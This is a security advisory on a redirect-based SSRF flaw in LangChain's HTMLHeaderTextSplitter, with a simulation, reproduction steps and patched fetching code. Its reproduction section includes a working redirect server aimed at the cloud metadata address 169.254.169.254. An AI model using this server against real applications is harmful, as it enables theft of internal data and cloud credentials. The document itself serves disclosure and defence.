LangChain HTMLHeaderTextSplitter SSRF Vulnerability in Text Splitter Component
Vulnerability
A server-side request forgery (SSRF) vulnerability has been identified in the LangChain framework, specifically in the 'langchain-text-splitters' package in versions prior to 1.1.2. The issue is in the 'HTMLHeaderTextSplitter.split_text_from_url()' method. It validates the URL it is given but then fetches that URL with redirects enabled, so redirect targets are never checked. An attacker can therefore supply a URL that passes validation and then redirects to internal services or cloud metadata endpoints, bypassing the SSRF protection. If the application returns the fetched Document contents to the requester, this can lead to data exfiltration.
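The core flaw is a check-then-use gap: only the first URL in the redirect chain is validated. The Python sketch below simulates this gap without any network access. It is not LangChain's code. The blocklist, the redirect table, and the helper names 'is_allowed' and 'fetch' are hypothetical, and 203.0.113.10 is a documentation address standing in for an attacker's public host.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical blocklist for this simulation only (not LangChain's list).
BLOCKED_NETWORKS = [
    ipaddress.ip_network(cidr)
    for cidr in ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
                 "192.168.0.0/16", "169.254.0.0/16")
]

# Hypothetical redirect table standing in for real HTTP responses:
# each URL maps to the URL it redirects to, or None if it serves content.
REDIRECTS = {
    "http://203.0.113.10/docs": "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/": None,
}


def is_allowed(url: str) -> bool:
    """Accept only URLs whose host is an IP literal outside BLOCKED_NETWORKS."""
    host = urlsplit(url).hostname
    try:
        addr = ipaddress.ip_address(host)
    except (TypeError, ValueError):
        return False  # hostnames are not resolved in this simplified sketch
    return not any(addr in net for net in BLOCKED_NETWORKS)


def fetch(url: str, revalidate_redirects: bool) -> str:
    """Walk the simulated redirect chain and return the final URL reached."""
    if not is_allowed(url):  # the initial URL is always checked
        raise ValueError(f"blocked URL: {url}")
    while REDIRECTS.get(url) is not None:
        url = REDIRECTS[url]
        # The flawed pattern skips this check for redirect targets.
        if revalidate_redirects and not is_allowed(url):
            raise ValueError(f"blocked redirect: {url}")
    return url


if __name__ == "__main__":
    # Without per-hop checks, the chain ends at the metadata address.
    print(fetch("http://203.0.113.10/docs", revalidate_redirects=False))
    # With per-hop checks, the redirect is rejected.
    try:
        fetch("http://203.0.113.10/docs", revalidate_redirects=True)
    except ValueError as exc:
        print(exc)
```

The only difference between the two calls is whether each redirect hop is re-checked, which is the step the vulnerable method omits.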
Impact
Exploitation of this vulnerability could allow an attacker to access internal endpoints or cloud metadata services, potentially leading to unauthorized data exposure. This is particularly concerning for applications that return Document contents to the requester, as sensitive data from internal sources could be leaked.
Reproduction
To reproduce this vulnerability, pass a URL that points to an attacker-controlled, publicly reachable server to the 'split_text_from_url()' method of the 'HTMLHeaderTextSplitter' class. Because this URL is not itself internal, it passes the 'validate_safe_url()' check. The attacker's server then responds with an HTTP redirect to an internal endpoint. 'requests.get()' follows the redirect, and because the redirect target is never revalidated, the request reaches the internal endpoint.
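The attacker-controlled URL only has to answer with an HTTP redirect. The following standard-library Python sketch runs such a server. The handler name, the default bind address, and the metadata path in 'INTERNAL_TARGET' are illustrative assumptions. For an actual reproduction, the server would need to run on a publicly reachable host, because a loopback URL would presumably be rejected by 'validate_safe_url()' itself. The '__main__' block only performs a local self-check that the redirect is served.

```python
import http.client
import http.server
import threading

# Redirect target: 169.254.169.254 is the link-local address used by the
# instance metadata services of several cloud providers. The path is illustrative.
INTERNAL_TARGET = "http://169.254.169.254/latest/meta-data/"


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    """Answer every GET request with a 302 pointing at INTERNAL_TARGET."""

    def do_GET(self) -> None:
        self.send_response(302)
        self.send_header("Location", INTERNAL_TARGET)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format: str, *args) -> None:
        pass  # silence the default per-request logging


def start_redirect_server(host: str = "127.0.0.1", port: int = 0) -> http.server.HTTPServer:
    """Serve RedirectHandler in a daemon thread; port 0 picks a free port."""
    server = http.server.HTTPServer((host, port), RedirectHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    # Local self-check: confirm the server answers with the redirect.
    server = start_redirect_server()
    conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
    conn.request("GET", "/")
    resp = conn.getresponse()
    print(resp.status, resp.getheader("Location"))
    conn.close()
    server.shutdown()
```

On an affected version, the public URL of this server would be passed to something like 'HTMLHeaderTextSplitter(headers_to_split_on=[("h1", "Header 1")]).split_text_from_url(url)'. 'requests.get()' would then follow the 302 to the metadata address.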
Remediation
Users are advised to update to 'langchain-text-splitters' version 1.1.2 or later. The fixed version requires 'langchain-core' version 1.2.31 or later. Additionally, 'split_text_from_url()' has been deprecated; users should manually fetch HTML content and pass it to the 'split_text()' method.
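One way to follow the recommended pattern is to fetch the HTML yourself and validate every hop, not just the first. The sketch below uses only the Python standard library and is not the patched LangChain implementation. 'is_public_address', 'SafeRedirectHandler', and 'fetch_html' are hypothetical names. The address check is illustrative rather than complete. For example, it does not prevent DNS rebinding between the check and the actual connection.

```python
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urlsplit


def is_public_address(url: str) -> bool:
    """Return True only for http(s) URLs whose host resolves solely to global IPs."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parts.hostname, parts.port or 0)
        # Strip any IPv6 zone suffix (e.g. "%eth0") before parsing.
        addrs = {ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos}
    except (OSError, ValueError):  # resolution failure or malformed URL/address
        return False
    return bool(addrs) and all(addr.is_global for addr in addrs)


class SafeRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Re-validate every redirect target before urllib follows it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # urllib has already resolved newurl against the request URL here.
        if not is_public_address(newurl):
            raise urllib.error.URLError(f"blocked redirect to {newurl}")
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_html(url: str, timeout: float = 10.0) -> str:
    """Fetch url with per-hop SSRF checks and return the body as text."""
    if not is_public_address(url):
        raise ValueError(f"blocked URL: {url}")
    # Passing a subclass of HTTPRedirectHandler replaces urllib's default one.
    opener = urllib.request.build_opener(SafeRedirectHandler)
    with opener.open(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")
```

The returned string can then be passed to the splitter, for example 'HTMLHeaderTextSplitter(headers_to_split_on=[("h1", "Header 1")]).split_text(fetch_html(url))'. The header list here is only an example.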
